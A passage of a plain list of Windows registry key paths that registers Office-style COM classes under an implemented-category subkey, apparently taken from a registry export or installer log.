HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020900-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020901-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020906-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020907-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{000209F0-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{000209F1-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{000209F2-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{000209F4-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{000209F5-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{000209FE-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{000209FF-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020C01-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020D09-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020D75-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00021400-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00021700-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00022601-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00022602-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00022603-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00024500-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00024502-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00024505-0014-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00024522-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002CE02-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E005-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E006-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E101-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E119-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E132-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E169-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E170-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E174-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E178-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E17C-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E185-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E187-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E18B-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030000-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030001-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030002-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030003-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030004-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030005-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030006-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0003000A-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0003000B-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0003000C-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0003000D-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0003000E-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00031009-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0003100A-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00031018-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00041943-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00044851-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{000498C4-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00061068-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00062000-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00062001-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00062002-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00062003-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00062004-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067009-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0006729A-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067800-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067801-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067802-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067803-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067804-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067808-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-